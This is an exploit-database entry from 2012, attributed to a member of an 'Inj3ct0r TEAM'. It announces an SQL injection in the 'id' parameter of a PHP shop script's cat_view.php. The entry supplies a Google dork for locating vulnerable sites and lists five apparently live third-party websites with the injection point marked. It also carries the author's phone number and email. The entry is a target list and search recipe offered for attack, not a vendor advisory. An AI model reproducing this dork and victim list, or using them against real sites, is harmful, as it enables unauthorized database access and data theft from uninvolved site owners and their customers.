essentialoilswholesaler - SQL Injection Vulnerability

2012-06-25T00:00:00
ID 1337DAY-ID-18809
Type zdt
Reporter dencowbie
Modified 2012-06-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              1
 0                I'm dencowbie Member From Inj3ct0r TEAM                 1
 1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1

 ==========================================================================
 <<<:>>>          essentialoilswholesaler - SQL Injection Vulnerability            <<:>>>
 ==========================================================================

 - About Me:
 >>>> dencowbie - Independent Security Research 
 >>>> [email protected] >>> x CP: +62857-2874-7705
 >>>> thecorneroflinux.com 


 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 >>>> Author        : Dencowbie
 >>>> Title Exploit : essentialoilswholesaler - SQL Injection Vulnerability
 >>>> date		    : 25-06-2012
 >>>> vendor		: essentialoilswholesaler
 >>>> URL vendor    : http://essentialoilswholesaler.com
 >>>> Google Dork   : inurl:"/cat_view.php?id="
 >>>> 0day exploits : 1337day.com Inj3ct0r Exploit DataBase
                   
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


 - Affected items (SQLi):
 http://127.0.0.1/webapps/cat_view.php?id=[SQLi]

 - Sample WebApps Vuln (SQLi):
 >>>> http://www.calvrycreations.com/cat_view.php?id=876' + [SQL Injection]
 >>>> http://jewelryforebay.com/cat_view.php?id=306'  + [SQL Injection]
 >>>> http://www.manufacturerfurniture.org/cat_view.php?id=685'  + [SQL Injection]
 >>>> http://stones-precious.com/cat_view.php?id=400'  + [SQL Injection]
 >>>> http://www.smgl.org/cat_view.php?id=697'  + [SQL Injection]



#  0day.today [2018-04-12]  #